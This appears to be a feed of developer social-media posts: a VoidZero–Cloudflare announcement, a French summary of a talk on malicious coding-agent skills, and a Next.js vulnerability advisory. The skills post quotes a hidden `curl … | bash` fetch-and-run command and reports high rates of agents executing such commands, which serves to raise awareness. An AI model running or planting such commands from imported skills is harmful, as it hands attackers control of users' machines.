doubleslash_dev

VoidZero is joining Cloudflare. Our mission stays the same: to make JavaScript developers more productive than ever before. Vite, Vitest, Rolldown, Oxc, and Vite+ remain MIT-licensed. Evan and the VoidZero team will continue leading them. Cloudflare shares our commitment to open source. Together, we can keep investing in the tooling developers rely on every day, while bringing the Vite ecosystem and Cloudflare’s platform even closer together.

Attention, les skills sont un vecteur d'attaque réel ! J'ai regardé un talk de Greg Pstrucha (Sentry) sur la sécu des « skills » pour agents de code (Claude Code, Codex, openclaw, etc.). Ce qu'il montre fait froid dans le dos ! Le principe : tu télécharges un skill depuis GitHub pour ton agent. Sauf que le skill embarque un `curl https://t.co/smPYbI7Col | bash` planqué dans un script shell ou un commentaire HTML. L'agent l'exécute sans broncher ! Greg a fait différents tests avec des agents et voici les résultats : - Un script shell avec une commande malveillante : 90 % de taux d'exécution sur tous les modèles (Opus 4.6, Codex 5.4, peu importe) - Le shebang de Claude Code qui run automatiquement une commande au chargement du skill : 100 % de succès, c'est la feature - Un https://t.co/qio0L4A2cj piégé glissé dans le projet : pytest l'exécute tout seul Et les scanners de vulnérabilités classiques (Snyk, etc.) ne voient rien passer. Bref, on est en train de reproduire l'équivalent des supply chain attacks npm/pip, mais version agents IA. Avec le même niveau de confiance aveugle qu'au début de npm. Sa reco est simple et elle vient de chez Anthropic : écris tes propres skills. Si t'en vois un qui a l'air utile, demande à ton LLM de t'en faire une version sur mesure plutôt que d'importer celui d'un inconnu. La vidéo: https://t.co/O1X7ZPd0ZZ L'article: https://t.co/eMVitpO2tg

Next.js just got its worst vulnerability ever, CVSS 8.6. → affects versions 13.4.13+, 14.x, 15.x, and 16.0.0–16.2.4 → attackers can access your internal services, cloud credentials, API keys, and admin panels → no authentication needed → one crafted request is all it takes → roughly 79,000 instances are exploitable right now → vercel-hosted apps are safe, self-hosted are not upgrade to 15.5.16 or 16.2.5 immediately.